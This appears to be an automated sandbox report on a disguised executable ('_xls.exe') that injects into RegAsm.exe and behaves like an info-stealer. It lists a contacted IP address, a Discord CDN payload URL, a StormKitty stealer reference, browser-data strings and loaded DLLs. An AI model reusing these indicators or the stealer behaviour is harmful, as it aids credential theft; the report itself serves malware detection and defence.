Source: |
Binary string: C:\Windows\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp |
Source: |
Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: RegAsm.exe, 00000002.00000002.2653222752.0000000001215000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Data.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: \??\C:\Windows\dll\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\symbols\exe\RegAsm.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbeTOT source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BC0000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: RegAsm.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2659308931.0000000005BB0000.00000004.00000020.00020000.00000000.sdmp, XClient.exe.2.dr |
Source: |
Binary string: mscorlib.pdbq source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp |
Source: |
Binary string: System.Xml.ni.pdbRSDS# source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: Microsoft.VisualBasic.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Core.ni.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Numerics.ni.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: HSDSDF32.pdbh source: rDoc5633276235623657_xls.exe |
Source: |
Binary string: System.Transactions.ni.pdbRSDSc source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: \??\C:\Windows\symbols\exe\RegAsm.pdbH source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Management.ni.pdbRSDSJ< source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: mscorlib.ni.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: \??\C:\Windows\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BB0000.00000004.00000020.00020000.00000000.sdmp, XClient.exe.2.dr |
Source: |
Binary string: \??\C:\Windows\RegAsm.pdbp( source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Configuration.pdb8< source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Configuration.ni.pdbRSDScUN source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp |
Source: |
Binary string: System.Runtime.Serialization.ni.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: \??\C:\Windows\RegAsm.pdb0(G source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Xml.ni.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Runtime.Serialization.ni.pdbRSDSg@h source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: mscorlib.pdbL} source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: oC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp |
Source: |
Binary string: System.ni.pdbRSDS source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: mscorlib.pdb< source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: Microsoft.VisualBasic.pdbRSDSc source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: HSDSDF32.pdb source: rDoc5633276235623657_xls.exe |
Source: |
Binary string: C:\Windows\RegAsm.pdbpdbAsm.pdb source: RegAsm.exe, 00000002.00000002.2653222752.0000000001215000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: n0C:\Windows\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp |
Source: |
Binary string: System.Configuration.ni.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BC0000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BC0000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: mscorlib.ni.pdbRSDS source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: \??\C:\Windows\exe\RegAsm.pdba source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Data.ni.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Configuration.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Xml.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: o.pdb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp |
Source: |
Binary string: System.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Numerics.ni.pdbRSDSautg source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: %%.pdb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp |
Source: |
Binary string: System.Windows.Forms.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BB0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp, WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.pdbhk@ source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Drawing.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Management.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Xml.pdb@DHLPhl source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Data.ni.pdbRSDS source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Management.ni.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Core.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Transactions.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: \??\C:\Windows\exe\RegAsm.pdbE source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: symbols\dll\mscorlib.pdbLb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp |
Source: |
Binary string: System.Runtime.Serialization.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Core.pdbxm. source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Transactions.ni.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: mscorlib.pdb246122658-3693405117-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 source: RegAsm.exe, 00000002.00000002.2653222752.0000000001215000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Numerics.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Windows.Forms.pdbDN. source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.ni.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Data.pdb, source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Core.ni.pdbRSDS source: WER8A2C.tmp.dmp.9.dr |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: rDoc5633276235623657_xls.exe, 00000000.00000002.1784666277.0000000002D63000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://cdn.discordapp.com |
Source: rDoc5633276235623657_xls.exe, 00000000.00000002.1784666277.0000000002D63000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://cdn.discordapp.comd |
Source: RegAsm.exe, 00000002.00000002.2660991014.0000000006AD0000.00000004.08000000.00040000.00000000.sdmp |
String found in binary or memory: http://james.newtonking.com/projects/json |
Source: rDoc5633276235623657_xls.exe, 00000000.00000002.1784666277.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2654703990.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: Amcache.hve.9.dr |
String found in binary or memory: http://upx.sf.net |
Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.dr |
String found in binary or memory: https://ac.ecosia.org/autocomplete?q= |
Source: rDoc5633276235623657_xls.exe, 00000000.00000002.1784666277.0000000002D56000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.discordapp.com |
Source: rDoc5633276235623657_xls.exe |
String found in binary or memory: https://cdn.discordapp.com/attachments/1288648799220400244/1288791621017669705/xxxxxxxxxxx.txt?ex=66 |
Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.dr |
String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= |
Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.dr |
String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search |
Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.dr |
String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= |
Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.dr |
String found in binary or memory: https://duckduckgo.com/ac/?q= |
Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.dr |
String found in binary or memory: https://duckduckgo.com/chrome_newtab |
Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.dr |
String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= |
Source: RegAsm.exe, 00000002.00000002.2654703990.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/LimerBoy/StormKitty |
Source: places.raw.2.dr |
String found in binary or memory: https://support.mozilla.org |
Source: places.raw.2.dr |
String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br |
Source: places.raw.2.dr |
String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF |
Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, tmp1CF0.tmp.dat.2.dr |
String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 |
Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E16000.00000004.00000800.00020000.00000000.sdmp, tmp1CF0.tmp.dat.2.dr |
String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples |
Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, tmp1CF0.tmp.dat.2.dr |
String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 |
Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E16000.00000004.00000800.00020000.00000000.sdmp, tmp1CF0.tmp.dat.2.dr |
String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install |
Source: RegAsm.exe, 00000002.00000002.2660991014.0000000006AD0000.00000004.08000000.00040000.00000000.sdmp |
String found in binary or memory: https://urn.to/r/sds_see |
Source: RegAsm.exe, 00000002.00000002.2660991014.0000000006AD0000.00000004.08000000.00040000.00000000.sdmp |
String found in binary or memory: https://urn.to/r/sds_seeaCould |
Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.dr |
String found in binary or memory: https://www.ecosia.org/newtab/ |
Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.dr |
String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico |
Source: places.raw.2.dr |
String found in binary or memory: https://www.mozilla.org |
Source: places.raw.2.dr |
String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2 |
Source: places.raw.2.dr |
String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR |
Source: RegAsm.exe, 00000002.00000002.2656518468.00000000041B5000.00000004.00000800.00020000.00000000.sdmp, tmp743.tmp.dat.2.dr, places.raw.2.dr |
String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox |
Source: places.raw.2.dr |
String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig |
Source: RegAsm.exe, 00000002.00000002.2656518468.00000000041B5000.00000004.00000800.00020000.00000000.sdmp, tmp743.tmp.dat.2.dr, places.raw.2.dr |
String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www. |
Source: RegAsm.exe, 00000002.00000002.2660991014.0000000006AD0000.00000004.08000000.00040000.00000000.sdmp |
String found in binary or memory: https://www.newtonsoft.com/jsonschema |
Source: RegAsm.exe, 00000002.00000002.2660991014.0000000006AD0000.00000004.08000000.00040000.00000000.sdmp |
String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Code function: 0_2_02B02B28 |
0_2_02B02B28 |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Code function: 0_2_02B011D8 |
0_2_02B011D8 |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Code function: 0_2_02B02B21 |
0_2_02B02B21 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Code function: 2_2_01334150 |
2_2_01334150 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Code function: 2_2_01331030 |
2_2_01331030 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Code function: 2_2_0133E250 |
2_2_0133E250 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Code function: 2_2_013394A0 |
2_2_013394A0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Code function: 2_2_01333B57 |
2_2_01333B57 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Code function: 2_2_01339D70 |
2_2_01339D70 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Code function: 2_2_0133DC29 |
2_2_0133DC29 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Code function: 2_2_0133BC50 |
2_2_0133BC50 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Code function: 2_2_01339158 |
2_2_01339158 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Code function: 2_2_01331628 |
2_2_01331628 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Code function: 2_2_066024E8 |
2_2_066024E8 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Code function: 2_2_06605670 |
2_2_06605670 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Code function: 2_2_0666B408 |
2_2_0666B408 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Code function: 2_2_06661498 |
2_2_06661498 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Code function: 2_2_06660040 |
2_2_06660040 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Code function: 2_2_0666DB20 |
2_2_0666DB20 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Code function: 2_2_06661488 |
2_2_06661488 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Code function: 2_2_0666F558 |
2_2_0666F558 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Code function: 2_2_0666B3F8 |
2_2_0666B3F8 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Code function: 2_2_0666A388 |
2_2_0666A388 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Code function: 2_2_06660022 |
2_2_06660022 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Code function: 2_2_06660F28 |
2_2_06660F28 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Code function: 2_2_06660F18 |
2_2_06660F18 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Code function: 2_2_06684A18 |
2_2_06684A18 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Code function: 2_2_066882D8 |
2_2_066882D8 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Code function: 2_2_06681010 |
2_2_06681010 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Code function: 2_2_06681D48 |
2_2_06681D48 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Code function: 2_2_06684A08 |
2_2_06684A08 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Code function: 2_2_066882CA |
2_2_066882CA |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Code function: 2_2_06680FFF |
2_2_06680FFF |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Code function: 2_2_0668B7A4 |
2_2_0668B7A4 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Code function: 2_2_0668B810 |
2_2_0668B810 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Code function: 2_2_066879C8 |
2_2_066879C8 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Code function: 2_2_066849D8 |
2_2_066849D8 |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: mscoree.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: vcruntime140_clr0400.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: rasapi32.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: rasman.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: rtutils.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: ondemandconnroutehelper.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: dhcpcsvc6.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: dhcpcsvc.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: dnsapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: winnsi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: rasadhlp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: fwpuclnt.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: secur32.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: schannel.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: mskeyprotect.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: ntasn1.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: ncrypt.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: ncryptsslp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: gpapi.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: mscoree.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: aclayers.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: mpr.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: sfc.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: sfc_os.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: vcruntime140_clr0400.dll |
